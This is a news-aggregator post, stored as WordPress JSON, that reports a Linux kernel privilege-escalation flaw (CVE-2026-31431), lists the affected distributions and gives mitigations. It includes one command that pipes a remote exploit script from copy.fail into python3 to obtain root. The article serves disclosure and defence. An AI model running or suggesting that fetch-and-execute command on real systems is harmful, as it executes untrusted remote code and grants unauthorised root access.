{"id":247713,"date":"2026-05-01T03:00:00","date_gmt":"2026-05-01T07:00:00","guid":{"rendered":"https:\/\/news-you-need.com\/index.php\/2026\/05\/01\/linux-exploit-instantly-grants-administrator-access-on-most-distributions-since-2017-cryptography-optimization-snafu-grants-root-privileges-to-local-users\/"},"modified":"2026-05-17T16:01:14","modified_gmt":"2026-05-17T20:01:14","slug":"linux-exploit-instantly-grants-administrator-access-on-most-distributions-since-2017-cryptography-optimization-snafu-grants-root-privileges-to-local-users","status":"publish","type":"post","link":"https:\/\/news-you-need.com\/index.php\/2026\/05\/01\/linux-exploit-instantly-grants-administrator-access-on-most-distributions-since-2017-cryptography-optimization-snafu-grants-root-privileges-to-local-users\/","title":{"rendered":"Linux exploit instantly grants administrator access on most distributions since 2017 \u2014 cryptography optimization snafu grants root privileges to local users"},"content":{"rendered":"<p><a href=\"https:\/\/www.tomshardware.com\/tech-industry\/cyber-security\/linux-exploit-instantly-grants-administrator-access-on-most-distributions-since-2017-cryptography-optimization-snafu-grants-root-privileges-to-local-users\">Linux exploit instantly grants administrator access on most distributions since 2017 \u2014 cryptography optimization snafu grants root privileges to local users<\/a><\/p>\n<p><a href=\"https:\/\/www.tomshardware.com\/tech-industry\/cyber-security\/linux-exploit-instantly-grants-administrator-access-on-most-distributions-since-2017-cryptography-optimization-snafu-grants-root-privileges-to-local-users\">https:\/\/www.tomshardware.com\/tech-industry\/cyber-security\/linux-exploit-instantly-grants-administrator-access-on-most-distributions-since-2017-cryptography-optimization-snafu-grants-root-privileges-to-local-users<\/a><\/p>\n<p>Publish Date: <a href=\"publish_date]\">2026-05-01 03:00:00<\/a><\/p>\n<p>Source Domain: <a 
href=\"www.tomshardware.com\">www.tomshardware.com<\/a><\/p>\n<p id=\"elk-011a6ed8-2adf-4e01-977e-3d00147b7e37\">It is quite an interesting patch week for Linux systems administrators out there. Researchers at Xint Code have discovered a nasty exploit that instantly grants root access to any local unprivileged user, a nightmare scenario for multi-user servers of various types, including web servers, container environments like Kubernetes, CI\/CD pipelines, and more.<\/p>\n<p>The CVE-2026-31431 exploit affects pretty much every Linux distro currently in use and has existed since 2017. Although it&#8217;s not a zero-day and the kernel has already gotten a patch, the short disclosure window gave distro makers relatively little time to react. Affected variants include (but aren&#8217;t limited to) Ubuntu 24 (version 26 was just released last week), RHEL 10, Suse 16, and Amazon Linux 2023. Even Windows&#8217; WSL2 is affected, and all it takes is 732 bytes to do it.<\/p>\n<p id=\"elk-011a6ed8-2adf-4e01-977e-3d00147b7e37-2\">To check that a system is vulnerable, you can just run &#8220;curl https:\/\/copy.fail\/exp | python3 &#038;&#038; su&#8221; with a standard unprivileged account \u2014 though we should note that you&#8217;re trusting an online script. The source code for the proof-of-concept is available here if you prefer. 
If your distro doesn&#8217;t have a patch available yet, you can try one of two mitigation methods.<\/p>\n<p class=\"paywall\" aria-hidden=\"true\">If your kernel loads algif_aead as a module, a simple [ echo &quot;install algif_aead \/bin\/false&quot; &gt; \/etc\/modprobe.d\/disable-algif.conf ] will suffice. Some distributions, however, compile that functionality right into the kernel core, including RHEL and WSL2. That means that in those instances, you&#8217;ll have to resort to disallowing users from opening AF_ALG sockets to begin with, via seccomp profiles, AppArmor, or SELinux.<\/p>\n<p class=\"paywall\" aria-hidden=\"true\">Although the Xint Code security team didn&#8217;t provide a rationale for publicly disclosing the vulnerability so early, they did mention that they found it with the help of an AI assistant. 
Given that the source code for the Linux kernel is by definition public, in theory, any serious attacker would&#8230;<\/p>\n<p><a href=\"https:\/\/www.tomshardware.com\/tech-industry\/cyber-security\/linux-exploit-instantly-grants-administrator-access-on-most-distributions-since-2017-cryptography-optimization-snafu-grants-root-privileges-to-local-users\">Source<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Linux exploit instantly grants administrator access on most distributions since 2017 \u2014 cryptography optimization snafu&#8230;<\/p>\n","protected":false},"author":1,"featured_media":247714,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/cdn.mos.cms.futurecdn.net\/iMxEdJKjjPfdmwRbtJFnhh-2122-80.jpg","fifu_image_alt":"","footnotes":""},"categories":[48],"tags":[90,31,71,57,79,27],"class_list":["post-247713","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-linux","tag-cve","tag-exploit","tag-linux","tag-security","tag-ubuntu","tag-vulnerability"],"_links":{"self":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/247713"}],"collection":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/comments?post=247713"}],"version-history":[{"count":1,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/247713\/revisions"}],"predecessor-version":[{"id":247715,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/247713\/revisions\/247715"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/media\/247714"}],"wp:attachmen
t":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/media?parent=247713"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/categories?post=247713"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/tags?post=247713"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}